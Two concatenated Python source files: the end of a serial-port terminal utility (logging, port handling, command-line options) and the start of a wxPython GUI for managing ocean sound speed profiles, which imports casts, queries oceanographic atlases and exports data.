print('%sAborting...' % linesep)
self._cleanup()
return
def _cleanup(self):
"""Cleanup resource before exiting"""
try:
self._resume = False
if self._logfilter:
self._logfilter.stop()
if self._port:
# wait till the other thread completes
sleep(0.5)
try:
rem = self._port.inWaiting()
except IOError:
# maybe a bug in underlying wrapper...
rem = 0
# consumes all the received bytes
for _ in range(rem):
self._port.read()
self._port.close()
self._port = None
print('Bye.')
for tfd, att in self._termstates:
if att is not None:
tcsetattr(tfd, TCSANOW, att)
except Exception as ex:
print(str(ex), file=stderr)
def _set_silent(self, enable):
if bool(self._silent) == bool(enable):
return
if enable:
null = open(devnull, 'w')
self._out = null
elif self._out != __stdout__:
self._out.close()
self._out = __stdout__
if self._logfilter:
self._logfilter.set_output(self._out)
def _get_logger(self, filelog, syslog):
logger = get_time_logger('tde.pyterm')
loglevel = FATAL
if filelog and filelog[0]:
logfile, formatter, level = filelog
handler = WatchedFileHandler(logfile)
handler.setFormatter(formatter)
handler.setLevel(level)
logger.addHandler(handler)
loglevel = min(loglevel, level)
if syslog and syslog[0]:
sysdesc, level = syslog
handler, formatter = self._create_syslog(sysdesc)
# not sure why this character is needed as a start of message
handler.ident = ':'
handler.setFormatter(formatter)
handler.setLevel(level)
logger.addHandler(handler)
loglevel = min(loglevel, level)
logger.setLevel(loglevel)
return logger
@staticmethod
def _create_syslog(syslog):
logargs = syslog.split(':')
try:
facility = getattr(SysLogHandler, 'LOG_%s' % logargs[0].upper())
except AttributeError:
raise RuntimeError('Invalid facility: %s' % logargs[0])
host = logargs[1] if len(logargs) > 1 else 'localhost'
try:
if len(logargs) > 2 and logargs[2]:
port = int(logargs[2])
else:
port = SYSLOG_UDP_PORT
except (ValueError, TypeError):
raise RuntimeError('Invalid syslog port')
try:
addr = gethostbyname(host)
except OSError:
raise RuntimeError('Invalid syslog host')
if len(logargs) > 3 and logargs[3]:
remotefmt = logargs[3].strip("'")
else:
remotefmt = r'%(message)s'
return (SysLogHandler(address=(addr, port), facility=facility),
Formatter(remotefmt))
@staticmethod
def _open_port(device, baudrate, parity, rtscts, debug=False):
"""Open the serial communication port"""
try:
from serial.serialutil import SerialException
from serial import PARITY_NONE
except ImportError:
raise ImportError("Python serial module not installed")
try:
from serial import serial_for_url, VERSION as serialver
version = tuple([int(x) for x in serialver.split('.')])
if version < (2, 6):
raise ValueError
except (ValueError, IndexError, ImportError):
raise ImportError("pyserial 2.6+ is required")
# the following import enables serial protocol extensions
if device.startswith('ftdi:'):
try:
from pyftdi import serialext
serialext.touch()
except ImportError:
raise ImportError("PyFTDI module not installed")
try:
port = serial_for_url(device,
baudrate=baudrate,
parity=parity or PARITY_NONE,
rtscts=rtscts,
timeout=0)
if not port.is_open:
port.open()
if not port.is_open:
raise IOError('Cannot open port "%s"' % device)
if debug:
backend = port.BACKEND if hasattr(port, 'BACKEND') else '?'
print("Using serial backend '%s'" % backend)
return port
except SerialException as exc:
raise IOError(str(exc))
def _logfile_init(self, logfile):
filepath = abspath(logfile.name)
self._logfile = (logfile, filepath)
self._logfile_statstream()
def _logfile_statstream(self):
fst = self._logfile[0]
if fst:
sres = fstat(fst.fileno())
self._logfile = (fst, self._logfile[1], sres.st_dev, sres.st_ino)
def _logfile_reopen_if_needed(self):
"""
Reopen log file if needed.
        Check whether the underlying file has changed and, if it has,
        close the old stream and reopen the file to get the current
        stream.
"""
stream = self._logfile[0]
if not stream:
return
try:
# stat the file by path, checking for existence
sres = stat(self._logfile[1])
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
fdev, fino = self._logfile[2:]
if not sres or sres.st_dev != fdev or sres.st_ino != fino:
if stream is not None:
mode = 'wt' if isinstance(stream, TextIOBase) else 'wb'
stream.flush()
stream.close()
stream = None
filepath = self._logfile[1]
stream = open(filepath, mode)
self._logfile = (stream, filepath)
self._logfile_statstream()
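# --- Illustrative sketch (not part of the original module) ---
# Stand-alone illustration of the deque/Event hand-off used by
# MiniTerm._sourcer (producer) and MiniTerm._get_from_source (consumer) above:
# the producer drains the hardware as fast as possible and parks the chunks in
# a deque, while the consumer waits on an Event with a short timeout so it can
# also notice a shutdown request. Reuses deque/Event/Thread imported above.
def _example_deque_handoff():
    rxq, rxe, done = deque(), Event(), Event()
    def producer():
        for chunk in (b'hello ', b'deque ', b'world'):
            rxq.append(chunk)   # park the chunk, never block the source
            rxe.set()           # wake up the consumer
        done.set()
    def consumer():
        out = bytearray()
        while not (done.is_set() and not rxq):
            if not rxq:
                if rxe.wait(0.1):   # short timeout keeps us responsive to 'done'
                    rxe.clear()
                continue
            out += rxq.popleft()
        print(out.decode())
    worker = Thread(target=producer)
    worker.start()
    consumer()
    worker.join()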
def get_default_device():
"""Get default serial port for the current host OS.
"""
if osname == 'nt':
device = 'COM1'
elif osname == 'posix':
(system, _, _, _, _) = uname()
if system.lower() == 'darwin':
device = '/dev/cu.usbserial'
else:
device = '/dev/ttyS0'
try:
stat(device)
except OSError:
device = 'ftdi:///1'
else:
device = None
return device
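# --- Illustrative sketch (not part of the original module) ---
# How a '-y' specification maps onto a logging handler through
# MiniTerm._create_syslog above: the spec is 'facility:[host[:port[:format]]]',
# so e.g. 'user:localhost:514' selects SysLogHandler.LOG_USER and emits UDP
# datagrams to localhost:514 with the default '%(message)s' format.
# The spec value used here is only an example.
def _example_syslog_handler(spec='user:localhost:514'):
    handler, formatter = MiniTerm._create_syslog(spec)
    handler.setFormatter(formatter)
    return handler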
def main():
"""Main routine"""
debug = False
try:
default_device = get_default_device()
argparser = ArgumentParser(description=modules[__name__].__doc__)
if osname in ('posix', ):
argparser.add_argument('-f', '--fullmode', dest='fullmode',
action='store_true',
help='use full terminal mode, exit with '
'[Ctrl]+B')
argparser.add_argument('-p', '--device', default=default_device,
help='serial port device name (default: %s)' %
default_device)
argparser.add_argument('-b', '--baudrate',
help='serial port baudrate (default: %d)' %
MiniTerm.DEFAULT_BAUDRATE,
default='%s' % MiniTerm.DEFAULT_BAUDRATE)
argparser.add_argument('-w', '--hwflow',
action='store_true',
help='hardware flow control')
argparser.add_argument('-P', '--pdelay', type=float,
help='pulse DTR at start-up (delay in seconds)')
argparser.add_argument('-e', '--localecho',
action='store_true',
help='local echo mode (print all typed chars)')
argparser.add_argument('-r', '--crlf',
action='count', default=0,
help='prefix LF with CR char, use twice to '
'replace all LF with CR chars')
argparser.add_argument('-l', '--loopback',
action='store_true',
help='loopback mode (send back all received '
'chars)')
argparser.add_argument('-T', '--reltime', action='store_true',
help='show relative time, not host time')
argparser.add_argument('-o', '--rawlog', type=FileType('wb'),
help='output (unformatted) log file')
argparser.add_argument('-O', '--logfile',
help='output formatted, rotatable log file')
argparser.add_argument('-y', '--syslog',
help='push log to syslog daemon '
'facility:[host[:port[:format]]]')
argparser.add_argument('-g', '--filterlog', action='store_true',
help='enable filter log feature, flip-flop with'
' [Ctrl]+G')
argparser.add_argument('-c', '--color', action='store_true',
help='show available colors and exit')
argparser.add_argument('-s', '--silent', action='store_true',
help='silent mode')
argparser.add_argument('-v', '--verbose', action='count', default=0,
help='increase verbosity')
argparser.add_argument('-d', '--debug', action='store_true',
help='enable debug mode')
args = argparser.parse_args()
debug = args.debug
if args.color:
fmtcls = get_term_formatter(not is_term())
fmtcls(stdout, None).show_colors()
exit(0)
if not args.device:
argparser.error('Serial device not specified')
loglevel = max(DEBUG, ERROR - (10 * (args.verbose or 0)))
loglevel = min(ERROR, loglevel)
localfmt = Formatter('%(levelname)s %(asctime)s.%(msecs)03d '
'%(message)s', '%H:%M:%S')
FtdiLogger.set_formatter(localfmt)
FtdiLogger.set_level(loglevel if args.verbose > 3 else ERROR)
if args.filterlog:
fmtcls = get_term_formatter(not is_term())
logfilter = fmtcls(stdout, None,
basetime=-1 if args.reltime else None)
else:
logfilter = None
miniterm = MiniTerm(device=args.device,
baudrate=to_int(args.baudrate),
parity='N',
rtscts=args.hwflow,
logfilter=logfilter,
logfile=args.rawlog,
filelog=(args.logfile, localfmt, loglevel),
syslog=(args.syslog, loglevel),
debug=args.debug)
if args.pdelay:
miniterm.pulse_dtr(args.pdelay)
        miniterm.run(getattr(args, 'fullmode', False), args.loopback, args.silent,
                     args.localecho, args.crlf)
except (IOError, ValueError) as exc:
print('\nError: %s' % exc, file=stderr)
if debug:
print(format_exc(chain=False), file=stderr)
exit(1)
except KeyboardInterrupt:
exit(2)
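# --- Illustrative sketch (not part of the original module) ---
# Programmatic equivalent of a plain command-line session such as
# 'pyterm.py -p ftdi:///1 -b 115200 -f' (the device URL is only an example).
# It builds a MiniTerm without file or syslog logging, optionally pulses DTR
# to reset the target, and enters full terminal mode (exit with [Ctrl]+B).
def _example_session(device='ftdi:///1'):
    term = MiniTerm(device=device, baudrate=115200, parity='N', rtscts=False,
                    logfilter=None, logfile=None, filelog=None, syslog=None,
                    debug=False)
    term.pulse_dtr(0.2)       # brief DTR pulse, often wired to a HW reset line
    term.run(fullmode=True)   # blocks until the session is terminated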
if __name__ == '__main__':
main()
|
sspmanager.py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import math
import socket
import datetime as dt
import threading
import time
import copy
import numpy as np
import matplotlib.patches
import wx
from wx import PyDeadObjectError
from . import wxmpl # local version of this module, since Pydro's one has an issue
import logging
log = logging.getLogger(__name__)
from hydroffice.base.helper import HyOError
from hydroffice.base.timerthread import TimerThread
from hydroffice.base.gdal_aux import GdalAux
from .plots import WxPlots, PlotsSettings
from . import sspmanager_ui
from . import refmonitor
from . import geomonitor
from . import settingsviewer
from . import userinputsviewer
from . import __version__
from . import __license__
from hydroffice.ssp import project
from hydroffice.ssp import oceanography
from hydroffice.ssp.ssp_db import SspDb
from hydroffice.ssp.ssp_dicts import Dicts
from hydroffice.ssp.ssp_collection import SspCollection
from hydroffice.ssp.helper import Helper, SspError
from hydroffice.ssp.atlases.woa09checker import Woa09Checker
from hydroffice.ssp_settings import ssp_settings
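# --- Illustrative sketch (not part of the original module) ---
# Throughout the class below, a cast is stored as a 2-D numpy array whose rows
# are addressed through Dicts.idx (e.g. data[Dicts.idx['depth'], :]) and whose
# 'flag' row marks rejected samples. The literal row indices used here are
# assumptions for illustration only; the real mapping lives in
# hydroffice.ssp.ssp_dicts.Dicts.
def _example_flag_masking():
    idx = {'depth': 0, 'speed': 1, 'flag': 2}           # hypothetical layout
    data = np.array([[1.0, 2.0, 3.0, 4.0],              # depth [m]
                     [1500.0, 1501.0, 1502.0, 1503.0],  # sound speed [m/s]
                     [0, 1, 0, 0]])                     # flag: 1 = rejected
    good_pts = (data[idx['flag'], :] == 0)              # boolean mask, as in _reset_view_limits()
    return data[idx['speed'], good_pts].min(), data[idx['speed'], good_pts].max()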
class SSPManager(sspmanager_ui.SSPManagerBase):
here = os.path.abspath(os.path.dirname(__file__))
gui_state = {
"OPEN": 0,
"CLOSED": 1,
"SERVER": 2
}
def __init__(self):
sspmanager_ui.SSPManagerBase.__init__(self, None, -1, "")
self.version = __version__
self.license = __license__
# take care of WOA09 atlas
if not Woa09Checker.is_present():
dial = wx.MessageDialog(None, 'The WOA09 atlas (used by some advanced SSP functions)\n'
'was not found!\n\n'
'The required data files (~350MB) can be retrieved by\n'
'downloading this archive:\n'
' ftp.ccom.unh.edu/fromccom/hydroffice/woa09.zip\n'
'and unzipping it into:\n'
' %s\n\n'
                                          'Do you want me to perform this operation for you?\n'
'Internet connection is required!\n'
% Woa09Checker.get_atlases_folder(),
'SSP Manager - WOA09 atlas', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION)
if dial.ShowModal() == wx.ID_YES:
chk = Woa09Checker()
with_woa09 = chk.present
if not with_woa09:
wx.MessageDialog(None, 'Unable to retrieve the WOA09 atlas. You might:\n'
' - download the archive from (anonymous ftp):\n'
' ftp.ccom.unh.edu/fromccom/hydroffice/woa09.zip\n'
' - unzip the archive into:\n'
' %s\n'
' - restart SSP Manager\n'
% Woa09Checker.get_atlases_folder(),
'WOA09 atlas', wx.OK | wx.ICON_QUESTION)
log.info("disabling WOA09 functions")
else:
log.info("disabling WOA09 functions")
with_woa09 = False
else:
with_woa09 = True
with_rtofs = True
# We load WOA09 atlas and attempt the RTOFS atlas (since it requires internet connection)
self.prj = project.Project(with_listeners=True, with_woa09=with_woa09, with_rtofs=with_rtofs)
# check listeners
if not self.prj.has_running_listeners():
msg = 'Kongsberg and/or Sippican and/or MVP network I/O cannot bind to ports.\n' \
'Is there another instance of SSP Manager running already?'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
# check woa09 atlas
if (not self.prj.woa09_atlas_loaded) and with_woa09:
msg = 'Unable to load World Ocean Atlas grid file'
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
# check rtofs atlas
if (not self.prj.rtofs_atlas_loaded) and with_rtofs:
msg = 'Unable to load RTOFS atlas.\n' \
'To use RTOFS, Internet connectivity is required (with port 9090 open).\n' \
'RTOFS queries disabled.'
dlg = wx.MessageDialog(None, msg, "Warning", wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
self.status_message = ""
# UI
self.p = PlotsSettings()
self.ref_monitor = None
self.geo_monitor = None
self.settings_viewer = None
self.settings_tool = None
self.inputs_viewer = None
self.init_ui()
# update state
self.state = None
self._update_state(self.gui_state["CLOSED"])
# GUI timers (status bar and plots)
self.status_timer = TimerThread(self._update_status, timing=2)
self.status_timer.start()
self.plot_timer = TimerThread(self._update_plot, timing=30)
self.plot_timer.start()
self.SetMinSize(wx.Size(500, 300))
self.SetSize(wx.Size(1000, 550))
def init_ui(self):
favicon = wx.Icon(os.path.join(self.here, 'media', 'favicon.png'), wx.BITMAP_TYPE_PNG, 32, 32)
wx.Frame.SetIcon(self, favicon)
if os.name == 'nt':
try:
# This is needed to display the app icon on the taskbar on Windows 7
import ctypes
app_id = 'SSP Manager v.%s' % self.version
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(app_id)
except AttributeError as e:
log.debug("Unable to change app icon: %s" % e)
self.Bind(wx.EVT_CLOSE, self.on_file_exit)
# add plots panel
self.p.plots = WxPlots(self)
self.p.plots.callback_right_click_down = self.on_context
# expand the panel to fit the whole app
self.GetSizer().Add(self.p.plots, 1, wx.EXPAND)
self.GetSizer().Fit(self)
self.Layout()
# register to receive wxPython SelectionEvents from a PlotPanel or PlotFrame
wxmpl.EVT_SELECTION(self, self.p.plots.GetId(), self._on_area_selected)
wxmpl.EVT_POINT(self, self.p.plots.GetId(), self._on_point_selected)
# Other graphical panels are instantiated and are only shown when requested
self.ref_monitor = refmonitor.RefMonitor(self.prj.km_listener)
self.geo_monitor = geomonitor.GeoMonitor(self.prj.km_listener)
self.settings_viewer = settingsviewer.SettingsViewer(self.prj.s)
self.inputs_viewer = userinputsviewer.UserInputsViewer(parent=self, ssp_user_inputs=self.prj.u)
def on_context(self, event):
""" Create and show a Context Menu """
# we don't want the context menu without data
if not self.prj.has_ssp_loaded:
return
        # only do this part the first time so the menu ids are created and the
        # events are bound exactly once
        if not hasattr(self, "id_ctx_reset_view"):
            self.id_ctx_reset_view = wx.NewId()
            self.Bind(wx.EVT_MENU, self.on_reset_view, id=self.id_ctx_reset_view)
            self.id_ctx_zoom = wx.NewId()
            self.Bind(wx.EVT_MENU, self.on_popup, id=self.id_ctx_zoom)
            self.id_ctx_flag = wx.NewId()
            self.Bind(wx.EVT_MENU, self.on_popup, id=self.id_ctx_flag)
            self.id_ctx_unflag = wx.NewId()
            self.Bind(wx.EVT_MENU, self.on_popup, id=self.id_ctx_unflag)
            self.id_ctx_insert = wx.NewId()
            self.Bind(wx.EVT_MENU, self.on_popup, id=self.id_ctx_insert)
        # build the menu
        context_menu = wx.Menu()
        context_menu.Append(self.id_ctx_reset_view, "Reset view")
        context_menu.AppendSeparator()
        item_zoom = context_menu.Append(self.id_ctx_zoom, "Zoom",
                                        "Zoom on plot by mouse selection", wx.ITEM_RADIO)
        if self.PlotZoom.IsChecked():
            item_zoom.Check(True)
        item_flag = context_menu.Append(self.id_ctx_flag, "Flag",
                                        "Flag samples on plot by mouse selection", wx.ITEM_RADIO)
        if self.PlotFlag.IsChecked():
            item_flag.Check(True)
        item_unflag = context_menu.Append(self.id_ctx_unflag, "Unflag",
                                          "Unflag samples on plot by mouse selection", wx.ITEM_RADIO)
        if self.PlotUnflag.IsChecked():
            item_unflag.Check(True)
        item_insert = context_menu.Append(self.id_ctx_insert, "Insert",
                                          "Insert a sample by mouse clicking", wx.ITEM_RADIO)
        if self.PlotInsert.IsChecked():
            item_insert.Check(True)
# show the popup menu
self.PopupMenu(context_menu)
context_menu.Destroy()
event.Skip()
def on_popup(self, event):
"""Print the label of the menu item selected"""
item_id = event.GetId()
menu = event.GetEventObject()
menu_item = menu.FindItemById(item_id)
if menu_item.GetLabel() == "Zoom":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotZoom.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotZoom.Check(True)
elif menu_item.GetLabel() == "Flag":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotFlag.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotFlag.Check(True)
elif menu_item.GetLabel() == "Unflag":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotUnflag.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotUnflag.Check(True)
elif menu_item.GetLabel() == "Insert":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotInsert.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotInsert.Check(True)
# ####### FILE ########
# Import
def on_file_import_castaway(self, evt):
self._open_data_file(Dicts.import_formats['CASTAWAY'])
def on_file_import_saiv(self, evt):
self._open_data_file(Dicts.import_formats['SAIV'])
def on_file_import_idronaut(self, evt):
self._open_data_file(Dicts.import_formats['IDRONAUT'])
def on_file_import_digibar_pro(self, evt):
self._open_data_file(Dicts.import_formats['DIGIBAR_PRO'])
def on_file_import_digibar_s(self, evt):
self._open_data_file(Dicts.import_formats['DIGIBAR_S'])
def on_file_import_sippican(self, evt):
self._open_data_file(Dicts.import_formats['SIPPICAN'])
def on_file_import_seabird(self, evt):
self._open_data_file(Dicts.import_formats['SEABIRD'])
def on_file_import_turo(self, evt):
self._open_data_file(Dicts.import_formats['TURO'])
def on_file_import_unb(self, evt):
self._open_data_file(Dicts.import_formats['UNB'])
def on_file_import_valeport_midas(self, evt):
self._open_data_file(Dicts.import_formats['VALEPORT_MIDAS'])
def on_file_import_valeport_monitor(self, evt):
self._open_data_file(Dicts.import_formats['VALEPORT_MONITOR'])
def on_file_import_valeport_minisvp(self, evt):
self._open_data_file(Dicts.import_formats['VALEPORT_MINI_SVP'])
def _open_data_file(self, input_format):
if not (input_format in Dicts.import_formats.values()):
raise SspError("unsupported import format: %s" % input_format)
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
try:
ext = Dicts.import_extensions[input_format]
except KeyError:
raise SspError("unsupported import extension format: %s" % input_format)
# retrieve the name of the format
name_format = [key for key, value in Dicts.import_formats.items() if value == input_format][0]
        selection_filter = "%s files (*.%s,*.%s)|*.%s;*.%s|All Files (*.*)|*.*" \
% (name_format, ext, ext.upper(), ext, ext.upper())
dlg = wx.FileDialog(self, "File selection", "", "", selection_filter, style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return
import_directory = dlg.GetDirectory()
import_file = dlg.GetFilename()
dlg.Destroy()
filename = os.path.join(import_directory, import_file)
try:
self.prj.open_file_format(filename, input_format, self.get_date, self.get_position)
except SspError as e:
dlg = wx.MessageDialog(None, e.message, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
# set the new SSP for the refraction monitor
if self.ref_monitor:
self.ref_monitor.set_ssp(self.prj.ssp_data)
self.ref_monitor.set_corrector(0)
self._update_state(self.gui_state['OPEN'])
self._update_plot()
self.status_message = "Loaded %s" % self.prj.filename
# Query
def on_file_query_woa09(self, evt):
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: Failed on WOA2009 grid load"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
msg = "User requested WOA09 synthetic cast"
log.info(msg)
latitude, longitude = self.get_position()
if (latitude is None) or (longitude is None):
log.info("not a valid position")
return
log.info("using position: %s, %s" % (longitude, latitude))
query_date = self.get_date()
if query_date is None:
log.info("not a valid date time")
return
log.info("using date time: %s" % query_date)
try:
woa_data, woa_min, woa_max = self.prj.woa09_atlas.query(latitude, longitude, query_date)
if woa_data is None:
log.info("unable to retrieve data")
return
except SspError:
msg = "Failed on WOA09 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
log.info("got WOA SSP:\n%s" % woa_data)
self.prj.ssp_woa = woa_data
self.prj.ssp_woa_min = woa_min
self.prj.ssp_woa_max = woa_max
self.prj.ssp_data = copy.deepcopy(woa_data)
self.prj.filename = "%s_WOA09" % (self.prj.ssp_woa.date_time.strftime("%Y%m%d_%H%M%S"))
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Synthetic WOA09 cast"
log.info("Synthetic WOA09 cast using pos: (%.6f, %.6f) and time: %s"
% (latitude, longitude, query_date))
def on_file_query_rtofs(self, evt):
if not self.prj.rtofs_atlas_loaded:
msg = "Functionality disabled: Failed on RTOFS grid load"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
msg = "User requested RTOFS synthetic cast"
log.info(msg)
latitude, longitude = self.get_position()
if (latitude is None) or (longitude is None):
log.info("not a valid position")
return
log.info("using position: %s, %s" % (longitude, latitude))
query_date = self.get_date()
if query_date is None:
log.info("not a valid date time")
return
log.info("using date time: %s" % query_date)
try:
temp_ssp = self.prj.rtofs_atlas.query(latitude, longitude, query_date)
if temp_ssp is None:
log.info("empty result from RTOFS query")
return
except SspError:
msg = "Failed on RTOFS lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
self.prj.ssp_data = temp_ssp
try:
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = self.prj.woa09_atlas.query(latitude,
longitude,
query_date)
if self.prj.ssp_woa is None:
log.info("failure in performing WOA09 lookup")
except HyOError:
log.info("failure in performing WOA09 lookup")
self.prj.filename = "%s_RTOFS" % (self.prj.ssp_data.date_time.strftime("%Y%m%d_%H%M%S"))
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Synthetic RTOFS cast"
log.info("Synthetic RTOFS cast using pos: (%.6f, %.6f) and time: %s"
% (latitude, longitude, query_date))
def on_file_query_sis(self, evt):
log.info("requesting profile from SIS")
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
        # Request the current SVP cast from the clients first, and take the first one that comes through.
self.prj.km_listener.ssp = None
for client in range(self.prj.s.client_list.num_clients):
log.info("testing client %s" % self.prj.s.client_list.clients[client].IP)
self.prj.ssp_recipient_ip = self.prj.s.client_list.clients[client].IP
self.prj.get_cast_from_sis()
if self.prj.km_listener.ssp:
break
if not self.prj.km_listener.ssp:
msg = "Unable to get SIS cast from any clients"
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
log.info("got SSP from SIS: %s" % self.prj.km_listener.ssp)
latitude, longitude = self.get_position()
if (latitude is None) or (longitude is None):
log.info("not a valid position")
return
log.info("using position: %s, %s" % (longitude, latitude))
self.prj.ssp_data = self.prj.km_listener.ssp.convert_ssp()
self.prj.ssp_data.set_position(latitude, longitude)
self.prj.filename = "%s_SIS" % (self.prj.ssp_data.date_time.strftime("%Y%m%d_%H%M%S"))
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = \
self.prj.woa09_atlas.query(latitude, longitude, self.prj.ssp_data.date_time)
if self.prj.ssp_woa is not None:
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Retrieved SIS current cast, user chose %.2f %.2f for position, cast date is %s" % (
latitude, longitude, self.prj.ssp_data.date_time)
# Export
def on_file_export_asvp(self, evt):
self.prj.u.switch_export_format("ASVP")
def on_file_export_csv(self, evt):
self.prj.u.switch_export_format("CSV")
def on_file_export_pro(self, evt):
self.prj.u.switch_export_format("PRO")
def on_file_export_elac(self, evt):
self.prj.u.switch_export_format("ELAC")
def on_file_export_hips(self, evt):
self.prj.u.switch_export_format("HIPS")
def on_file_export_ixblue(self, evt):
self.prj.u.switch_export_format("IXBLUE")
def on_file_export_unb(self, evt):
self.prj.u.switch_export_format("UNB")
def on_file_export_vel(self, evt):
self.prj.u.switch_export_format("VEL")
def on_file_export_cast(self, evt):
"""Manage the user export"""
# check if at least a format was selected
if self.prj.count_export_formats() == 0:
msg = "Please select at least a file format for export!"
dlg = wx.MessageDialog(None, msg, "Cast export", wx.OK | wx.ICON_QUESTION)
dlg.ShowModal()
dlg.Destroy()
return
# set the export folder and filename
if self.prj.s.user_export_prompt_filename:
dlg = wx.FileDialog(self, "Specify an output file prefix", "", "", "All Files (*.*)|*.*",
style=wx.FD_SAVE | wx.FD_CHANGE_DIR)
            if dlg.ShowModal() == wx.ID_CANCEL:
                dlg.Destroy()
                return
            self.prj.u.user_export_directory = dlg.GetDirectory()
            filename = dlg.GetFilename()
            self.prj.u.user_filename_prefix = os.path.splitext(filename)[0]
            dlg.Destroy()
else:
            # Accommodate both files imported from an existing file (which carry a fully
            # qualified path in self.prj.filename) and files generated in memory (e.g. a WOA
            # query), which only carry a pathless filename in self.prj.filename.
self.prj.u.user_export_directory = self.prj.get_output_folder()
filename = os.path.basename(self.prj.filename)
self.prj.u.user_filename_prefix = os.path.splitext(filename)[0]
# actually do the export
self.prj.formats_export("USER")
# open export folder
Helper.explore_folder(self.prj.u.user_export_directory)
# clear
def on_file_clear(self, evt):
if self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
msg = "You haven't processed/delivered " + self.prj.filename \
+ " yet!\nAre you sure you want to close this file?"
dlg = wx.MessageDialog(None, msg, "Confirm File Close", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
self.prj.clean_project()
self.clear_app()
def clear_app(self):
self._update_plot()
self._update_state(self.gui_state['CLOSED'])
self.status_message = ""
def on_file_exit(self, evt):
dlg = wx.MessageDialog(self, "Do you really want to close this application?", "Confirm Exit",
wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
# Kill all gui tools
if self.ref_monitor:
log.info("killing refraction monitor")
self.ref_monitor.OnExit()
if self.geo_monitor:
log.info("killing geo monitor")
self.geo_monitor.OnExit()
if self.inputs_viewer:
log.info("killing user inputs viewer")
self.inputs_viewer.OnExit()
if self.settings_viewer:
log.info("killing settings viewer")
self.settings_viewer.OnExit()
if self.status_timer:
log.info("stopping status timer")
if self.status_timer.is_alive():
self.status_timer.stop()
if self.plot_timer:
log.info("stopping plot timer")
if self.plot_timer.is_alive():
self.plot_timer.stop()
self.prj.release()
time.sleep(2) # to be sure that all the threads stop
self.Destroy() # Close the frame.
log.info("exit done")
# ####### View ########
def on_reset_view(self, evt):
self.p.has_zoom_applied = False
self._update_plot()
def on_view_hide_flagged(self, evt):
self.p.display_flagged = not self.p.display_flagged
self._update_plot()
def on_view_hide_woa(self, evt):
if not self.prj.has_ssp_loaded:
return
self.p.display_woa = not self.p.display_woa
self._update_plot()
def on_view_hide_depth(self, evt):
self.p.display_depth = not self.p.display_depth
self._update_plot()
def _reset_view_limits(self):
if self.p.has_zoom_applied or (not self.prj.has_ssp_loaded):
return
good_pts = (self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
if self.p.display_flagged:
good_pts[:] = True
self.p.min_speed = min(self.prj.ssp_data.data[Dicts.idx['speed'], good_pts])
self.p.max_speed = max(self.prj.ssp_data.data[Dicts.idx['speed'], good_pts])
self.p.min_temp = min(self.prj.ssp_data.data[Dicts.idx['temperature'], good_pts])
self.p.max_temp = max(self.prj.ssp_data.data[Dicts.idx['temperature'], good_pts])
self.p.min_sal = min(self.prj.ssp_data.data[Dicts.idx['salinity'], good_pts])
self.p.max_sal = max(self.prj.ssp_data.data[Dicts.idx['salinity'], good_pts])
self.p.max_depth = min(self.prj.ssp_data.data[Dicts.idx['depth'], good_pts])
self.p.min_depth = max(self.prj.ssp_data.data[Dicts.idx['depth'], good_pts])
